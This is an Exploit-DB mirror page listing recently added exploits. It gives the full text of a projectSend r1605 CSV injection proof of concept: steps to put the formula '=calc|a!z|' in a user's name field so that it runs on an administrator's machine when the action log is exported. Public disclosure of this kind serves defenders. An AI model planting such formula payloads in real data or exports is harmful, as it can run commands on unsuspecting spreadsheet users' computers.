exploit-db-mirror/exploits/php/webapps/51517.txt
Exploit-DB 158fcdfd5c DB: 2023-06-15
11 changes to exploits/shellcodes/ghdb

Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution

Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)

Online Thesis Archiving System v1.0 - Multiple-SQLi

projectSend r1605 - CSV injection

projectSend r1605 - Stored XSS

Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)

Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
2023-06-15 00:16:23 +00:00

19 lines
No EOL
626 B
Text

Exploit Title: projectSend r1605 - CSV injection
Version: r1605
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Windows
2. Technical Details & POC
========================================
Step 1. login as user
step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
step 3. Set name as =calc|a!z|
step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php )
payload: =calc|a!z|